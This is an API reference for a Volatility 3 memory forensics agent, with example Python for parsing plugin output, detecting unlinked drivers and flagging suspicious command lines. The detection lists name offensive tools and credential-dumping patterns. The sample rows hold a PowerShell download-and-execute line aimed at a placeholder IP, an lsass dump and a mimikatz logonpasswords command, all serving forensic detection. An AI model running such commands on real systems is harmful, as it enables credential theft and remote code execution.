Anthropic-Cybersecurity-Skills/skills/conducting-memory-forensics-with-volatility/references/api-reference.md
mukul975 27c6414ca5 Add folder anatomy (scripts/agent.py + references/api-reference.md) for 648 cybersecurity skills
Complete skill folder anatomy across all cybersecurity skills:
- scripts/agent.py: 80-150 line Python agents using real libraries (impacket,
  boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.)
- references/api-reference.md: real API documentation with method signatures
- LICENSE: MIT license for all skill folders
2026-03-10 21:02:12 +01:00

# API Reference: Memory Forensics Agent (Volatility 3)

## Overview

Automates memory forensics triage of a Windows memory image by driving Volatility 3 as a subprocess: process listing, network connections, process injection detection, command line extraction, and hidden driver/rootkit detection. Each check wraps one or two Volatility 3 plugins and writes its findings to a JSON report.

## Dependencies

| Package | Version | Purpose |
|---|---|---|
| volatility3 | >=2.0 | Memory forensics framework, invoked through its `vol` command line via subprocess |

The `vol` executable must be on `PATH`, and Volatility 3 needs a symbol table (ISF) matching the kernel build of the image. For Windows images it fetches the matching PDB from Microsoft's symbol server on first use, so an offline analysis host needs the symbols staged in advance.

## CLI Usage

```bash
python agent.py --memory-file memory.raw --output forensics_report.json
```

## Key Functions

### `run_volatility(memory_file, plugin, extra_args)`

Executes a Volatility 3 plugin via subprocess and parses its tab-delimited output (the default `quick` text renderer) into one dictionary per row. Tree-style plugins such as windows.pstree prefix rows with `*` depth markers and some fields contain whitespace, so parsing the text output is fragile; Volatility 3's `-r json` renderer returns the same rows as structured JSON and is the safer input for automation.
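The following is an added example of such a wrapper, not the agent's own `run_volatility`. It invokes the `vol` CLI with the `-r json` renderer and flattens the resulting rows, including the nested `__children` lists that tree plugins such as windows.pstree emit. The `vol` binary, the exact column names and the sample output are assumptions, and the sample is constructed rather than captured from a real image.

```python
"""Run a Volatility 3 plugin and turn its JSON renderer output into flat rows.

Added example; not the agent's own code. Assumes the `vol` CLI is on PATH and
that `-r json` emits a JSON array of row dicts with nested "__children" lists
(Volatility 3's JsonRenderer layout). Column names in the sample follow
windows.pstree but are assumed, not taken from a real capture.
"""
import json
import shutil
import subprocess


def build_command(memory_file, plugin, extra_args=(), vol_binary="vol"):
    """Command line for one plugin run. -q suppresses progress output so that
    stdout contains nothing but the JSON document."""
    return [vol_binary, "-q", "-f", memory_file, "-r", "json", plugin, *extra_args]


def flatten_rows(rows, depth=0):
    """Depth-first flatten of tree output. Each returned row is a copy with
    "__children" removed and "__depth" added; flat plugins (pslist, netscan)
    simply carry empty child lists and come out unchanged at depth 0."""
    flat = []
    for row in rows:
        row = dict(row)
        children = row.pop("__children", None) or []
        row["__depth"] = depth
        flat.append(row)
        flat.extend(flatten_rows(children, depth + 1))
    return flat


def parse_plugin_output(stdout_text):
    """Parse the JSON renderer's stdout; refuse anything that is not a row array."""
    data = json.loads(stdout_text)
    if not isinstance(data, list):
        raise ValueError("expected a JSON array of rows from `-r json`")
    return flatten_rows(data)


def run_volatility(memory_file, plugin, extra_args=(), vol_binary="vol"):
    """Execute the plugin and return flattened rows. stderr is surfaced on
    failure; the usual causes are an unknown plugin, a missing symbol table
    or an unreadable image."""
    if shutil.which(vol_binary) is None:
        raise FileNotFoundError(f"{vol_binary!r} not found on PATH (pip install volatility3)")
    proc = subprocess.run(build_command(memory_file, plugin, extra_args, vol_binary),
                          capture_output=True, text=True)
    if proc.returncode != 0:
        raise RuntimeError(f"{plugin} exited {proc.returncode}: {proc.stderr.strip()[-2000:]}")
    return parse_plugin_output(proc.stdout)


# Constructed stand-in for `vol -q -f memory.raw -r json windows.pstree` output.
SAMPLE_PSTREE_JSON = json.dumps([
    {"PID": 4, "PPID": 0, "ImageFileName": "System", "Threads": 92, "Wow64": False,
     "CreateTime": "2024-01-15T09:00:01+00:00", "ExitTime": None,
     "__children": [
         {"PID": 320, "PPID": 4, "ImageFileName": "smss.exe", "Threads": 2, "Wow64": False,
          "CreateTime": "2024-01-15T09:00:02+00:00", "ExitTime": None, "__children": []},
     ]},
    {"PID": 2280, "PPID": 1540, "ImageFileName": "powershell.exe", "Threads": 12, "Wow64": False,
     "CreateTime": "2024-01-15T13:42:10+00:00", "ExitTime": None,
     "__children": [
         {"PID": 3390, "PPID": 2280, "ImageFileName": "ctrl.exe", "Threads": 3, "Wow64": False,
          "CreateTime": "2024-01-15T13:42:31+00:00", "ExitTime": None, "__children": []},
     ]},
])


if __name__ == "__main__":
    # Offline demonstration on the constructed sample; swap in run_volatility(...)
    # with a real image to analyse actual output.
    for row in parse_plugin_output(SAMPLE_PSTREE_JSON):
        print("  " * row["__depth"] + f"{row['PID']:>6} {row['ImageFileName']}")
```

Keeping `__depth` on each flattened row preserves the parent/child relationship that pstree encodes, which is what lets later checks ask questions such as "which processes were spawned by powershell.exe".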

### `analyze_processes(memory_file)`

Runs windows.pslist and flags processes whose image name matches known offensive tooling (mimikatz, cobalt, meterpreter, psexec). pslist walks the kernel's active-process list, so a process unlinked from that list is not seen (windows.psscan, a pool scan, does find such processes), and the name match itself is defeated by renaming the binary.

### `analyze_network_connections(memory_file)`

Runs windows.netscan to recover TCP/UDP endpoints and connections and keeps only those in the ESTABLISHED state. This discards LISTENING sockets (bind-shell backdoors) and UDP endpoints, and because netscan is a pool scanner it can also return connections that had already been closed when the image was acquired.

### `detect_process_injection(memory_file)`

Runs windows.malfind, which reports private memory regions whose page protection allows both writing and execution (such as PAGE_EXECUTE_READWRITE) and shows a hex dump and disassembly of the region's first bytes. Injected or reflectively loaded code usually lives in such regions, but JIT runtimes (.NET, browsers, Java) create them legitimately, so each hit needs review, for example by checking for an MZ header or plausible code at the region start.

### `analyze_dlls(memory_file, pid)`

Lists loaded DLLs for a specific process (`--pid`) or for all processes via windows.dlllist. dlllist reads the load-order list in each process's PEB, so a module that was unlinked from that list or loaded reflectively without going through the loader does not appear; windows.ldrmodules cross-references the PEB lists with the VAD tree to expose such gaps.

### `extract_command_history(memory_file)`

Runs windows.cmdline and flags suspicious patterns (encoded PowerShell, credential dumping, LOLBin abuse). The command line is read from the PEB's ProcessParameters, which a process can overwrite after it starts (command line spoofing), so an innocuous value is not proof of innocence, and an encoded PowerShell command has to be base64-decoded as UTF-16LE before the inner patterns become visible.

### `check_kernel_modules(memory_file)`

Compares windows.modules (a walk of the PsLoadedModuleList linked list) with windows.driverscan (a pool scan for `_DRIVER_OBJECT` structures). A driver object whose image base does not correspond to any listed module points to a driver unlinked from the list, the classic rootkit hiding technique. Pool scanning also surfaces stale objects from drivers that were legitimately unloaded, so each hit should be corroborated, for example with windows.modscan or by inspecting the driver's IRP handlers with windows.driverirp.
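An added example of the cross-check described above, not the agent's `check_kernel_modules`: it takes the row dictionaries that the two plugins' JSON output would yield and reports driver objects whose image base appears in no loaded-module entry, separating out objects with no image base at all. The column names (`Base`/`Name` for modules, `Start`/`Size`/`Service Key`/`Driver Name` for driverscan) and the sample rows are assumptions to be checked against a real run, and the rows are constructed, not captured.

```python
"""Cross-check windows.modules against windows.driverscan for unlinked drivers.

Added example; not the agent's own code. Input rows are dicts shaped like the
JSON renderer output of each plugin. The column names used here are assumed to
match Volatility 3's and should be verified against a real run.
"""


def find_hidden_drivers(modules_rows, driverscan_rows):
    """Return (hidden, stale).

    hidden: driver objects found by pool scanning whose image base ("Start")
            is not the "Base" of any module in PsLoadedModuleList, i.e. the
            list walk did not see them -- the DKOM/unlinking pattern.
    stale:  driver objects with no image base at all; usually freed objects
            left behind by unloaded drivers and not evidence on their own.
    """
    known_bases = {row["Base"] for row in modules_rows if row.get("Base")}
    hidden, stale = [], []
    for drv in driverscan_rows:
        start = drv.get("Start") or 0
        entry = {
            "driver": drv.get("Driver Name"),
            "service_key": drv.get("Service Key"),
            "start": hex(start),
            "size": drv.get("Size"),
        }
        if start == 0:
            stale.append(entry)
        elif start not in known_bases:
            hidden.append(entry)
    return hidden, stale


# Constructed rows shaped like the two plugins' JSON output (not a real capture).
SAMPLE_MODULES = [
    {"Offset": 0xfffffa8000c9d040, "Base": 0xfffff80001600000, "Size": 0x5e7000,
     "Name": "ntoskrnl.exe", "Path": "\\SystemRoot\\system32\\ntoskrnl.exe"},
    {"Offset": 0xfffffa8000d11ce0, "Base": 0xfffff88001400000, "Size": 0xf2000,
     "Name": "ndis.sys", "Path": "\\SystemRoot\\system32\\drivers\\ndis.sys"},
    {"Offset": 0xfffffa8000d12f10, "Base": 0xfffff88001600000, "Size": 0x204000,
     "Name": "tcpip.sys", "Path": "\\SystemRoot\\System32\\drivers\\tcpip.sys"},
]
SAMPLE_DRIVERSCAN = [
    {"Offset": 0xfffffa8000e02a30, "Start": 0xfffff88001400000, "Size": 0xf2000,
     "Service Key": "NDIS", "Driver Name": "\\Driver\\NDIS"},
    {"Offset": 0xfffffa8000e10b60, "Start": 0xfffff88001600000, "Size": 0x204000,
     "Service Key": "tcpip", "Driver Name": "\\Driver\\tcpip"},
    # image base present in a driver object but absent from the loaded-module list
    {"Offset": 0xfffffa8002c4e1f0, "Start": 0xfffff88003a00000, "Size": 0x9000,
     "Service Key": "nbdrv", "Driver Name": "\\Driver\\nbdrv"},
    # driver object with no image base: leftover from a legitimately unloaded driver
    {"Offset": 0xfffffa8001a77e40, "Start": 0, "Size": 0,
     "Service Key": "", "Driver Name": "\\Driver\\oldfltr"},
]


if __name__ == "__main__":
    hidden, stale = find_hidden_drivers(SAMPLE_MODULES, SAMPLE_DRIVERSCAN)
    for h in hidden:
        print(f"HIDDEN  {h['driver']} base={h['start']} size={h['size']} (not in PsLoadedModuleList)")
    for s in stale:
        print(f"stale   {s['driver']} (no image base; probably unloaded)")
```

Matching on the image base rather than on names avoids false negatives from a rootkit that reuses a legitimate service key, and keeping the zero-base objects in a separate bucket stops unloaded drivers from inflating the hidden list.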

## Volatility 3 Plugins Used

| Plugin | Purpose |
|---|---|
| windows.pslist | List running processes |
| windows.netscan | Extract network connections |
| windows.malfind | Detect process injection |
| windows.dlllist | List loaded DLLs |
| windows.cmdline | Extract command line arguments |
| windows.registry.hivelist | List registry hives |
| windows.modules | List kernel modules |
| windows.driverscan | Scan for driver objects |

## Suspicious Process Indicators

Processes flagged: mimikatz, procdump, psexec, cobalt, beacon, meterpreter, nc.exe, ncat, certutil, bitsadmin, mshta, regsvr32, wscript, cscript.

The match is on the image name, so a renamed binary is missed, and the last six are signed Windows utilities (LOLBins) that run legitimately; treat those hits as leads to be confirmed through the parent process, command line and network activity rather than as verdicts.

## Suspicious Command Patterns

Commands flagged: powershell -enc, invoke-expression, downloadstring, net user, sekurlsa, lsadump, reg save, vssadmin, certutil -urlcache, bitsadmin /transfer.

Matching should be case-insensitive and should tolerate the aliases PowerShell accepts for `-EncodedCommand` (`-e`, `-ec`, `-enc` or any unambiguous prefix), and the base64 payload of an encoded command has to be decoded as UTF-16LE before patterns such as invoke-expression or downloadstring can match inside it.
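An added example that applies the two indicator lists above to windows.cmdline rows, not the agent's `extract_command_history`: it matches process names and command patterns case-insensitively, recognises every alias of `-EncodedCommand`, decodes the UTF-16LE base64 payload and searches the decoded text as well. The `PID`/`Process`/`Args` column names are assumed to match windows.cmdline's JSON output, and the sample rows, including the encoded payload, are constructed inside the block rather than taken from a real image.

```python
"""Flag suspicious processes and command lines in windows.cmdline rows.

Added example; not the agent's own code. Rows are dicts with the assumed
windows.cmdline columns "PID", "Process", "Args". Encoded PowerShell commands
are base64 of UTF-16LE text, so they are decoded and scanned as well.
"""
import base64
import binascii
import re

# Indicator lists from the agent's documentation.
PROCESS_INDICATORS = ["mimikatz", "procdump", "psexec", "cobalt", "beacon", "meterpreter",
                      "nc.exe", "ncat", "certutil", "bitsadmin", "mshta", "regsvr32",
                      "wscript", "cscript"]
COMMAND_PATTERNS = ["powershell -enc", "invoke-expression", "downloadstring", "net user",
                    "sekurlsa", "lsadump", "reg save", "vssadmin", "certutil -urlcache",
                    "bitsadmin /transfer"]

# powershell.exe accepts -ec and any prefix of -EncodedCommand from -e upwards;
# the lookahead stops "-e" from swallowing "-ExecutionPolicy".
_ENC_FLAGS = "|".join(["ec"] + ["encodedcommand"[:i] for i in range(1, 15)])
ENCODED_FLAG = re.compile(rf"-(?:{_ENC_FLAGS})(?=\s)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(token):
    """Base64 -> UTF-16LE text, or None if the token is not a valid payload."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16le")
    except (binascii.Error, ValueError):
        return None


def scan_cmdlines(records):
    """Return one finding per row that trips a process or command indicator."""
    findings = []
    for rec in records:
        hits = set()
        proc = (rec.get("Process") or "").lower()
        args = rec.get("Args") or ""
        for ind in PROCESS_INDICATORS:
            if ind in proc:
                hits.add(f"process:{ind}")
        searchable = args.lower()
        decoded = None
        match = ENCODED_FLAG.search(args)
        if match:
            hits.add("command:encoded powershell")
            decoded = decode_encoded_command(match.group(1))
            if decoded:  # scan the decoded script, where the real patterns live
                searchable += "\n" + decoded.lower()
        for pat in COMMAND_PATTERNS:
            if pat in searchable:
                hits.add(f"command:{pat}")
        if hits:
            findings.append({"pid": rec["PID"], "process": rec.get("Process"),
                             "indicators": sorted(hits), "decoded_command": decoded})
    return findings


# Constructed sample rows (not a real capture). The encoded payload is built here
# so the example stays self-contained and the decoder can be checked exactly.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
SAMPLE_CMDLINES = [
    {"PID": 4, "Process": "System", "Args": ""},
    {"PID": 612, "Process": "svchost.exe", "Args": "C:\\Windows\\system32\\svchost.exe -k netsvcs"},
    {"PID": 2280, "Process": "powershell.exe",
     "Args": f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED_PAYLOAD}"},
    {"PID": 3104, "Process": "procdump64.exe",
     "Args": "procdump64.exe -ma lsass.exe C:\\Users\\Public\\l.dmp"},
    # renamed mimikatz: the name check misses it, the command pattern does not
    {"PID": 3390, "Process": "ctrl.exe", "Args": "ctrl.exe privilege::debug sekurlsa::logonpasswords exit"},
]


if __name__ == "__main__":
    for f in scan_cmdlines(SAMPLE_CMDLINES):
        print(f"{f['pid']:>6} {f['process']:<16} {', '.join(f['indicators'])}")
        if f["decoded_command"]:
            print(f"       decoded: {f['decoded_command']}")
```

The renamed-mimikatz row shows why both lists are needed: the process name carries no signal, but `sekurlsa` in the arguments does, while the encoded PowerShell row only reveals `downloadstring` after decoding.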